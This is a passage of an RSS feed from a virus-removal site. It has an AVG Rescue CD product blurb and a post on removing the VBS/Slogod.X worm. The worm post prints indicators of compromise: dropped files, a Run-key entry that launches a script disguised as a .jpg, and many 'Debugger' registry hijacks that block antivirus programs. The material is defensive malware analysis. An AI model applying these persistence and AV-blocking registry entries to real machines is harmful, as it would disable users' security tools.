<li><a href='http://www.virusexperts.org/protection-tools/60-free-online-virus-trojan-spyware-and-malware-scanners-scan-or-removal/' rel='bookmark' title='Permanent Link: 60 Free Online Virus, Trojan, Spyware and Malware Scanners (Scan or Removal)'>60 Free Online Virus, Trojan, Spyware and Malware Scanners (Scan or Removal)</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p><img class="aligncenter" title="Rescue-CD" src="http://www.virusexperts.org/wp-content/uploads/HLIC/d199c5e3a9e4f283fcdadf7d5c1711d5.jpg" alt="" width="297" height="297" /></p>
<p style="text-align: justify;">The AVG Rescue CD is a powerful must-have toolkit for the rescue and repair of infected machines. It provides essential utilities for system administrators and other IT professionals and includes the following features:</p>
<ul>
<li>Comprehensive administration toolkit</li>
<li>System recovery from virus and spyware infections </li>
<li>Suitable for recovering MS Windows and Linux operating systems (FAT32 and NTFS file systems)</li>
<li>Ability to perform a clean boot from CD or USB stick</li>
<li>Free support and service for paid license holders of any AVG product</li>
<li>FAQ and Free Forum self-help support for AVG Free users</li>
</ul>
<p> </p>
<p> </p>
<h2>Key technologies</h2>
<p> </p>
<ul>
<li><strong>Anti-virus:</strong> protection against viruses, worms and Trojans</li>
<li><strong>Anti-spyware:</strong> protection against spyware, adware and identity theft </li>
<li><strong>Administration toolkit:</strong> system recovery tools</li>
</ul>
<p> </p>
<p style="text-align: justify;">The AVG Rescue CD is essentially a portable version of <strong>AVG Anti-Virus</strong> supplied through <strong>Linux distribution</strong>. It can be used in the form of a bootable CD or bootable USB flash drive to recover your computer when the system cannot be loaded normally, such as after an extensive or deep-rooted virus infection. In short, the AVG Rescue CD enables you to fully remove infections from an otherwise inoperable PC and render the system bootable again.</p>
<p> </p>
<p>Apart from the usual AVG functions (malware detection and removal, updates from internet or external device, etc.), the AVG Rescue CD also contains the following set of <strong>administration tools:</strong></p>
<ul>
<li><strong>Midnight Commander</strong> &#8211; a two-panel file manager </li>
<li><strong>Windows Registry Editor</strong>– simple registry editor for more experienced users</li>
<li><strong>TestDisk</strong> &#8211; powerful hard drive recovery tool</li>
<li><strong>Ping</strong> &#8211; to test the availability of network resources (servers, domains, IP addresses)</li>
<li><strong>Common Linux programs and services</strong>– vi text editor, OpenSSH daemon, ntfsprogs etc.</li>
</ul>
<p> </p>
<h2>Free of charge</h2>
<p> </p>
<p style="text-align: justify;">The AVG Rescue CD is a free-to-use product that anyone can download. This also covers any new program versions and virus database updates. If you have any other paid AVG license, you are also entitled to receive our full technical support.</p>
<p> </p>
<p><strong>Download:</strong></p>
<p><a href="http://www.avg.com/us-en/download-file-cd-arl-iso">Download Rescue CD (for CD creation)</a></p>
<p><a href="http://www.avg.com/us-en/download-file-cd-arl-rar">Download Rescue CD (for USB stick)</a></p>
<p> </p>
<p> </p>


<br /><h3><p>Related posts:</h3><ol><li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/bitdefender-2009-rescue-disk-cd/' rel='bookmark' title='Permanent Link: BitDefender 2009 Rescue Disk CD'>BitDefender 2009 Rescue Disk CD</a></li>
<li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/regrun-reanimator-a-powerful-tool-kit-against-trojans-viruses-spyware-adware-and-rootkits/' rel='bookmark' title='Permanent Link: RegRun Reanimator &#8211; A powerful tool kit against Trojans, viruses, spyware, adware and rootkits'>RegRun Reanimator &#8211; A powerful tool kit against Trojans, viruses, spyware, adware and rootkits</a></li>
<li><a href='http://www.virusexperts.org/protection-tools/60-free-online-virus-trojan-spyware-and-malware-scanners-scan-or-removal/' rel='bookmark' title='Permanent Link: 60 Free Online Virus, Trojan, Spyware and Malware Scanners (Scan or Removal)'>60 Free Online Virus, Trojan, Spyware and Malware Scanners (Scan or Removal)</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.virusexperts.org/removal-tips-tools-and-videos/avg-rescue-cd-a-powerful-toolset-for-rescue-repair-of-infected-machines/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Removal tool for W32/VBSAuto-C, VBS/Slogod.X (Startup.scr, winxp.exe, winjpg.jpg, M.p.jpg) WORM</title>
		<link>http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-w32vbsauto-c-vbsslogod-x-startup-scr-winxp-exe-winjpg-jpg-m-p-jpg-worm/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=removal-tool-for-w32vbsauto-c-vbsslogod-x-startup-scr-winxp-exe-winjpg-jpg-m-p-jpg-worm</link>
		<comments>http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-w32vbsauto-c-vbsslogod-x-startup-scr-winxp-exe-winjpg-jpg-m-p-jpg-worm/#comments</comments>
		<pubDate>Sun, 21 Mar 2010 20:02:22 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Removal Tips,Tools and Videos]]></category>
		<category><![CDATA[autorun]]></category>
		<category><![CDATA[microsoft windows script]]></category>
		<category><![CDATA[Not Detected]]></category>
		<category><![CDATA[Removal]]></category>
		<category><![CDATA[removal tool]]></category>
		<category><![CDATA[Removal Tools]]></category>
		<category><![CDATA[virusexperts.org]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[Worm]]></category>

		<guid isPermaLink="false">http://www.virusexperts.org/?p=2244</guid>
		<description><![CDATA[
  
 
 
 

 
Severity Level : 4/10
 
Alias:

 W32/VBSAuto-C [Sophos]
Script.Autorun.apd [McAfee]
NOT Detected [Kaspersky Lab]
Worm:VBS/Slogod.X [Microsoft]

 
M.p.jpg (MD5   : 6535e9edb9645ecb77abde2de4ae67f7)  &#8211;  VirusTotal Report : (Click Here)
 
File System Modifications
The following files were created in the system:
 

%system%\Startup.scr
%system%\Sys.dat
%system%\winjpg.jpg
%system%\winxp.exe

 
Note: 

%system% is a variable that refers to the System folder. By default, this is &#8220;C:\Windows\System&#8221; (Windows 95/98/Me), &#8220;C:\Winnt\System32&#8243; (Windows NT/2000), [...]

<h3>
Related posts:</h3><ol><li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-malfakeav-bw-generic-fakealerthr-packed-win32-krap-an-winupdate-exe-exec-exe-ppal-exe-mse5ad-exe-malware/' rel='bookmark' title='Permanent Link: Removal tool for Mal/FakeAV-BW, Generic FakeAlert!hr, Packed.Win32.Krap.an (winupdate.exe, exec.exe, ppal.exe, MSe5ad.exe) Malware'>Removal tool for Mal/FakeAV-BW, Generic FakeAlert!hr, Packed.Win32.Krap.an (winupdate.exe, exec.exe, ppal.exe, MSe5ad.exe) Malware</a></li>
<li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-suspect-1be4800a5bf6f6-malfakeav-bw-ave-exe-malware/' rel='bookmark' title='Permanent Link: Removal tool for Suspect-1B!E4800A5BF6F6, Mal/FakeAV-BW (ave.exe) Malware'>Removal tool for Suspect-1B!E4800A5BF6F6, Mal/FakeAV-BW (ave.exe) Malware</a></li>
<li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-malfakeav-co-downloader-cew-vvavia-exe-vdl-exe-vdk-exe-vdj-exe-malware/' rel='bookmark' title='Permanent Link: Removal tool for Mal/FakeAV-CO, Downloader-CEW (Vvavia.exe, Vdl.exe, Vdk.exe, Vdj.exe) Malware'>Removal tool for Mal/FakeAV-CO, Downloader-CEW (Vvavia.exe, Vdl.exe, Vdk.exe, Vdj.exe) Malware</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p style="border: 0px none ; margin: 0px; padding: 0px; text-align: center;"><img class="aligncenter size-full wp-image-2247" title="W32/VBSAuto-C - VBS/Slogod.X WORM Remover Tool" src="http://www.virusexperts.org/wp-content/uploads/2010/03/removal-tools-logo-250x250-21.png" alt="" width="250" height="250" /></p>
<p style="border: 0px none ; margin: 0px; padding: 0px; text-align: center;"><span id="PresenceContainer"><strong> </strong></span><span id="PresenceContainer"><strong> </strong></span></p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"><span id="more-2244"></span></p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"><span style="color: #ff0000;"><strong><span style="color: #000000;">Severity Level :</span> 4/10</strong></span></p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<h3><strong>Alias:</strong></h3>
<ul>
<li> W32/VBSAuto-C <span style="color: #ff0000;"><strong>[Sophos]</strong></span></li>
<li>Script.Autorun.apd <span style="color: #ff0000;"><strong>[McAfee]</strong></span></li>
<li>NOT Detected <strong><span style="color: #ff0000;">[Kaspersky Lab]</span></strong></li>
<li>Worm:VBS/Slogod.X<strong> <span style="color: #ff0000;">[Microsoft]</span></strong></li>
</ul>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p><strong><span style="color: #ff0000;">M.p.jpg</span></strong><strong><span style="color: #ff0000;"> </span>(</strong>MD5   : 6535e9edb9645ecb77abde2de4ae67f7) <strong> &#8211;  VirusTotal Report : (<a href="http://www.virustotal.com/analisis/dba592a0736226de3bf9a7a3c77b69b8fcf60aada54cbb84190e55ce0b235b45-1269190772" target="_blank">Click Here</a>)</strong></p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<h3>File System Modifications</h3>
<p style="border: 0px none ; margin: 0px; padding: 0px;">The following files were created in the system:</p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<ul>
<li><strong>%system%</strong><strong>\<span style="color: #ff0000;">Startup.scr</span><br /></strong></li>
<li><strong>%system%</strong><strong>\<span style="color: #ff0000;">Sys.dat</span></strong></li>
<li><strong>%system%</strong><strong>\<span style="color: #ff0000;">winjpg.jpg</span></strong></li>
<li><strong>%system%</strong><strong>\<span style="color: #ff0000;">winxp.exe</span></strong></li>
</ul>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"><span style="color: #ff0000;"><strong>Note: </strong></span></p>
<ul>
<li><strong>%system%</strong> is a variable that refers to the System folder. By default, this is <strong>&#8220;C:\Windows\System&#8221;</strong> (Windows 95/98/Me), <strong>&#8220;C:\Winnt\System32&#8243;</strong> (Windows NT/2000), or<strong> &#8220;C:\Windows\System32&#8243;</strong> (Windows XP).</li>
<li><strong>?</strong> = Random file name.</li>
</ul>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<h3>Memory Modifications</h3>
<p style="border: 0px none ; margin: 0px; padding: 0px;">There were new processes created in the system:</p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<table style="margin-bottom: 25px; height: 151px;" border="0" cellspacing="0" cellpadding="5" width="526">
<tbody>
<tr>
<td>
<h3>Process Name</h3>
</td>
<td>
<h3>Process Filename</h3>
</td>
</tr>
<tr>
<td style="text-align: center;"><strong><span style="color: #ff0000;">Startup.scr</span></strong></td>
<td><strong>%system%</strong><strong>\<span style="color: #ff0000;">Startup.scr</span></strong><span style="color: #ff0000;"><strong> </strong></span></td>
</tr>
<tr>
<td style="text-align: center;"><strong><span style="color: #ff0000;">winxp.exe</span></strong></td>
<td><strong>%system%</strong><strong>\</strong><strong><span style="color: #ff0000;"> </span></strong><strong><span style="color: #ff0000;">winxp.exe</span></strong></td>
</tr>
<tr>
<td><strong><span style="color: #ff0000;"><br /></span></strong></td>
<td><strong><br /></strong><strong><span style="color: #ff0000;"> </span></strong></td>
</tr>
</tbody>
</table>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p> </p>
<h3>Registry Modifications</h3>
<p style="border: 0px none ; margin: 0px; padding: 0px;">The newly created or modified Registry Value is:</p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p><strong>[HKEY_CLASSES_ROOT\exefile\shell\Open application]</strong></p>
<p><strong>[HKEY_CLASSES_ROOT\exefile\shell\Open application\command]</strong></p>
<p><strong>[HKEY_CLASSES_ROOT\exefile\shell\Open application\command]<br />@=&#8221;C:\\WINDOWS\\system32\\winxp.exe&#8221;</strong></p>
<p><strong>[HKEY_CLASSES_ROOT\exefile\shell\Scan for virus,s]</strong></p>
<p><strong>[HKEY_CLASSES_ROOT\exefile\shell\Scan for virus,s\command]</strong></p>
<p><strong>[HKEY_CLASSES_ROOT\exefile\shell\Scan for virus,s\command]<br />@=&#8221;C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\winjpg.jpg&#8221;</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Win]</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Win]<br />&#8220;klg&#8221;=hex:01,</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host]</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings]</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings]<br />&#8220;DisplayLogo&#8221;=dword:00000000</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings]<br />&#8220;Timeout&#8221;=dword:00000000</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]<br />&#8220;C:\\WINDOWS\\system32\\Shell32.DLL&#8221;=&#8221;Windows Shell Common Dll&#8221;</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]<br />&#8220;C:\\WINDOWS\\system32\\Wscript.exe&#8221;=&#8221;Microsoft (R) Windows Based Script Host&#8221;</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]<br />&#8220;C:\\WINDOWS\\system32\\winxp.exe&#8221;=&#8221;winxp&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Win]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Win]<br />&#8220;nck&#8221;=hex:e4,0e,a0,02,ad,2a,e5,57,26,c3,cd,74,fa,93,5b,67,</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\Open application]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\Open application\command]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\Open application\command]<br />@=&#8221;C:\\WINDOWS\\system32\\winxp.exe&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\Scan for virus,s]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\Scan for virus,s\command]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\Scan for virus,s\command]<br />@=&#8221;C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\winjpg.jpg&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{36E0783A-90B6-BC95-68C5-BE20436E47EA}]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{36E0783A-90B6-BC95-68C5-BE20436E47EA}]<br />&#8220;stubpath&#8221;=hex(2):43,3a,5c,57,49,4e,44,4f,57,53,5c,73,79,73,74,65,6d,33,32,5c,53,74,61,72,74,75,70,2e,73,63,72,20,73,00,</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<br />&#8220;regdiit&#8221;=&#8221;C:\\WINDOWS\\system32\\winxp.exe&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<br />&#8220;CTFMON&#8221;=&#8221;C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\winjpg.jpg&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\00hoeav.com]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\00hoeav.com]<br />&#8220;Debugger&#8221;=&#8221;C:\\WINDOWS\\system32\\winxp.exe&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\0w.com]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\0w.com]<br />&#8220;Debugger&#8221;=&#8221;C:\\WINDOWS\\system32\\winxp.exe&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.EXE]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.EXE]<br />&#8220;Debugger&#8221;=&#8221;C:\\WINDOWS\\system32\\winxp.exe&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safe.EXE]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safe.EXE]<br />&#8220;Debugger&#8221;=&#8221;C:\\WINDOWS\\system32\\winxp.exe&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safebox.EXE]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safebox.EXE]<br />&#8220;Debugger&#8221;=&#8221;C:\\WINDOWS\\system32\\winxp.exe&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.EXE]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.EXE]<br />&#8220;Debugger&#8221;=&#8221;C:\\WINDOWS\\system32\\winxp.exe&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\6.bat]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\6.bat]<br />&#8220;Debugger&#8221;=&#8221;C:\\WINDOWS\\system32\\winxp.exe&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\6fnlpetp.exe]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\6fnlpetp.exe]<br />&#8220;Debugger&#8221;=&#8221;C:\\WINDOWS\\system32\\winxp.exe&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\6x8be16.cmd]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\6x8be16.cmd]<br />&#8220;Debugger&#8221;=&#8221;C:\\WINDOWS\\system32\\winxp.exe&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a2cmd.EXE]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a2cmd.EXE]<br />&#8220;Debugger&#8221;=&#8221;C:\\WINDOWS\\system32\\winxp.exe&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a2free.EXE]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a2free.EXE]<br />&#8220;Debugger&#8221;=&#8221;C:\\WINDOWS\\system32\\winxp.exe&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a2service.EXE]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a2service.EXE]<br />&#8220;Debugger&#8221;=&#8221;C:\\WINDOWS\\system32\\winxp.exe&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a2upd.EXE]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a2upd.EXE]<br />&#8220;Debugger&#8221;=&#8221;C:\\WINDOWS\\system32\\winxp.exe&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\abk.bat]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\abk.bat]<br />&#8220;Debugger&#8221;=&#8221;C:\\WINDOWS\\system32\\winxp.exe&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Adobe Gamma Loader.exe]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Adobe Gamma Loader.exe]<br />&#8220;Debugger&#8221;=&#8221;C:\\WINDOWS\\system32\\winxp.exe&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\algsrvs.exe]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\algsrvs.exe]<br />&#8220;Debugger&#8221;=&#8221;C:\\WINDOWS\\system32\\winxp.exe&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\algssl.exe]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\algssl.exe]<br />&#8220;Debugger&#8221;=&#8221;C:\\WINDOWS\\system32\\winxp.exe&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Angry.bat]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Angry.bat]<br />&#8220;Debugger&#8221;=&#8221;C:\\WINDOWS\\system32\\winxp.exe&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Anti-Trojan.exe]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Anti-Trojan.exe]<br />&#8220;Debugger&#8221;=&#8221;C:\\WINDOWS\\system32\\winxp.exe&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ANTIARP.EXE]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ANTIARP.EXE]<br />&#8220;Debugger&#8221;=&#8221;C:\\WINDOWS\\system32\\winxp.exe&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\antihost.exe]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\antihost.exe]<br />&#8220;Debugger&#8221;=&#8221;C:\\WINDOWS\\system32\\winxp.exe&#8221;</strong></p>
<p> </p>
<p> </p>
<ul>
<strong><br /></strong>
</ul>
<p> </p>
<h3 style="border: 0px none ; margin: 0px; padding: 0px;"><strong>Removal Tools :</strong></h3>
<p style="border: 0px none ; margin: 0px; padding: 0px;"><strong><br /> </strong></p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"><strong>Download W32/VBSAuto-C &#8211; VBS/Slogod.X WORM Remover Tool that provided by VirusExperts.org  from <a title="W32/VBSAuto-C - VBS/Slogod.X WORM Remover Tool" href="http://www.virusexperts.org/wp-content/uploads/2010/03/W32-VBSAuto-C_Worm_Removal_V2_virusexperts.org_.zip" target="_blank">Here</a>.</strong></p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p> </p>
<div style="font-family: Verdana,sans-serif;"><span style="color: #000000;"><strong>For any help contact us.</strong></span></div>
<div style="color: #b45f06; font-family: Verdana,sans-serif;"><span style="color: #000000;"><strong>VirusExperts.org TEAM</strong></span></div>
<div style="color: #b45f06; font-family: Verdana,sans-serif;"><span style="color: #000000;"><strong><br /></strong></span></div>
<div style="color: #b45f06; font-family: Verdana,sans-serif;"><span style="color: #000000;"><strong><br /> </strong></span></div>
<div id="_mcePaste" style="overflow: hidden; left: -10000px; width: 1px; position: absolute; top: 741px; height: 1px;">%Temp%\cvasds0.dll <br /> %Temp%\cvasds1.dll <br /> %Temp%\cvasds2.dll</div>


<br /><h3><p>Related posts:</h3><ol><li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-malfakeav-bw-generic-fakealerthr-packed-win32-krap-an-winupdate-exe-exec-exe-ppal-exe-mse5ad-exe-malware/' rel='bookmark' title='Permanent Link: Removal tool for Mal/FakeAV-BW, Generic FakeAlert!hr, Packed.Win32.Krap.an (winupdate.exe, exec.exe, ppal.exe, MSe5ad.exe) Malware'>Removal tool for Mal/FakeAV-BW, Generic FakeAlert!hr, Packed.Win32.Krap.an (winupdate.exe, exec.exe, ppal.exe, MSe5ad.exe) Malware</a></li>
<li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-suspect-1be4800a5bf6f6-malfakeav-bw-ave-exe-malware/' rel='bookmark' title='Permanent Link: Removal tool for Suspect-1B!E4800A5BF6F6, Mal/FakeAV-BW (ave.exe) Malware'>Removal tool for Suspect-1B!E4800A5BF6F6, Mal/FakeAV-BW (ave.exe) Malware</a></li>
<li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-malfakeav-co-downloader-cew-vvavia-exe-vdl-exe-vdk-exe-vdj-exe-malware/' rel='bookmark' title='Permanent Link: Removal tool for Mal/FakeAV-CO, Downloader-CEW (Vvavia.exe, Vdl.exe, Vdk.exe, Vdj.exe) Malware'>Removal tool for Mal/FakeAV-CO, Downloader-CEW (Vvavia.exe, Vdl.exe, Vdk.exe, Vdj.exe) Malware</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-w32vbsauto-c-vbsslogod-x-startup-scr-winxp-exe-winjpg-jpg-m-p-jpg-worm/feed/</wfw:commentRss>
		<slash:comments>20</slash:comments>
		</item>
	</channel>
</rss>
